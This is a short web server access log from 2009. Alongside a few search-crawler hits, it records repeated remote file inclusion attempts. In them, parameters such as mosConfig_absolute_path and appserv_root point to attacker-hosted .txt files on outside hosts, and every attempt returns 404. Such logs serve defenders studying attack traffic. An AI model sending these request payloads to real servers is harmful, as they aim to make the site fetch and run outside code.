70.38.31.183 - - [20/Nov/2009:08:16:50 -0800] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:08:17:24 -0800] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:08:17:32 -0800] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.237 - - [20/Nov/2009:08:17:46 -0800] "GET /blog/index.php/2008/09/ HTTP/1.0" 200 12026 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
70.38.31.183 - - [20/Nov/2009:08:17:49 -0800] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
157.100.230.82 - - [20/Nov/2009:08:18:32 -0800] "GET /logs/access_091024.log//appserv/main.php?appserv_root=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:08:18:47 -0800] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.111.181 - - [20/Nov/2009:08:21:25 -0800] "GET /bikes/dteel/2008_02_08/?M=A HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
